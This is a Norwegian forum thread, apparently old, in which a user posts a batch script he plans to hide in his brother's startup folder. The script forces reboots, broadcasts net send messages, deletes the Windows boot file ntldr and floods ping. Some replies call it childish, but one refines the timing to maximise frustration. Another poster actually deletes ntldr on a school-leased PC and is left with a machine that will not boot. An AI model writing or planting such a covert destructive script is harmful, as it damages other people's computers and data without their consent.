Gå til innhold

Anbefalte innlegg

slemt å legge denne i run at startup?(Cmd for dette?)er ikke verre en at jeg vil legge dette in på min brors pc for han spiller litt for mye :)

cmd /T:2d /Q

shutdown -r -f -t 66 -c "No More WoW"

net send * cast_gj er en 1337 |-|4xx0r

cd..

cd..

cd..

del /A ntldr

ping 127.0.0.1 -l 65500 -t

Lenke til kommentar
Videoannonse
Annonse

net send sendes til alle PC'er i nettverket, ikke bare lokal PC, men Windows XP med ServicePack 1 eller 2 har deaktivert netsend, og må skrus på manuelt på den maskinen som skal sende, og motta, for at det skal funke.

Dessuten er det en ganske så barnslig ting å gjøre... :roll:

Lenke til kommentar
slemt å legge denne i run at startup?(Cmd for dette?)er ikke verre en at jeg vil legge dette in på min brors pc for han spiller litt for mye :)

7982090[/snapback]

Ja det er direkte slemt! Husk også at din bror sikkert vil hevne seg på deg og ditt utstyr.

Lenke til kommentar
net send sendes til alle PC'er i nettverket, ikke bare lokal PC, men Windows XP med ServicePack 1 eller 2 har deaktivert netsend, og må skrus på manuelt på den maskinen som skal sende, og motta, for at det skal funke.

Dessuten er det en ganske så barnslig ting å gjøre... :roll:

7982135[/snapback]

hvordan slår man på dette? jeg har bruk for dette hjemme da jeg vil sende melding til andre på nettverket.

Lenke til kommentar

del /A ntldr <--- den er slem, tar jo litt tid å fikse det, spess hvis han ikke vet hvordan, da blir det nok en reistallasjon...

ellers var det kanskje litt liten tid han fikk, sett det til f.eks 30 min, så han kan få spillt, men bli så frustrert at han ikke orker etter en time eller to...

Lenke til kommentar

min bror bor 12 mil unna meg og jeg er ikke så veldig ofte på besøk, men han gamer vist litt for mye. Barnslig.. ja men dog morsomt

"ellers var det kanskje litt liten tid han fikk, sett det til f.eks 30 min, så han kan få spillt, men bli så frustrert at han ikke orker etter en time eller to..."

haha genial idè ;)

men dette er jo et "virus" på en måte så regner med at viruskontrollen fjerner den. men den kan jo og skrus av (a)

Lenke til kommentar

dette er LANGT unna ett virus...

ingen kommer til å ta den, da ett virus sprer seg, og er registrert i pattern-fila, "viruset" du lager er ikke registrert der, og kommer ikke til å bli merket før man får smarte(AI) antivirus

og det er bare ett simpelt .bat script, stort sett alt du lager selv blir kkkk

Lenke til kommentar

Jeg lagde et lignende program en gang, det endra admin passord og slo av pc'en (var ikke slem siden jeg fiksa det for kameraten min etterpå). Men denne filen ble oppdaget av AVG på min egen pc.

Edit: Når jeg tenker meg om, så fant jeg et virus på pc'n min ikke lenge etterpå. Dette viruset la seg i exe filer, det kan ha noe med det gjøre. Men ikke sikker...

Endret av mhbakke
Lenke til kommentar

hrmph har et lite problem nå.. har slettet ntldr og problemet er at jeg sitter på en pc som jeg "leaser" fra skolen og har 2 oprativsystemer (et som er winpro med begrenset adgang) og dermed (tror jeg) kan jeg ikke boote opp fra cs ect eneste kanskje og bytte koble hard-discen i en annen pc som secondary...har ikke skrujern såeh noen andre forslag ? =P

Lenke til kommentar

hernil:

Her ser du hva som skjer når du nevner sånne kommandoer for folk som liker å prøve ;)

hrmph har et lite problem nå.. har slettet ntldr og problemet er at jeg sitter på en pc som jeg "leaser" fra skolen og har 2 oprativsystemer (et som er winpro med begrenset adgang) og dermed (tror jeg) kan jeg ikke boote opp fra cs ect eneste kanskje og bytte koble hard-discen i en annen pc som secondary...har ikke skrujern såeh noen andre forslag ? =P

8000377[/snapback]

Hva med å si hva du har gjort til skolen?

Hente en skrutrekker?

Hvis winpro == windows så kan du jo fikse og trikse litt, men effekten vil jo bli den samme som å sette hden i en annen maskin.

Lenke til kommentar

joda skal gå til it-ansvarlig i morgen

winpro må jeg logge på med nettverk username, og har ikke tilgang til blandt annet ledetekst, + har en 80 gb hard drive 20 gb til home(C-disk)

20gb til pro(c-disk) og 40gb til d-disk tilgjengelig på begge opprativsystemer

Skrutrekker:

Tenker på skru ut min hard disk fra pcn og bruke min hard disk som en secondary hard disk på en annen pc og erstatte de manglende filene

Endret av runeOo
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

• Ingen innloggede medlemmer aktive
  • Opprett ny...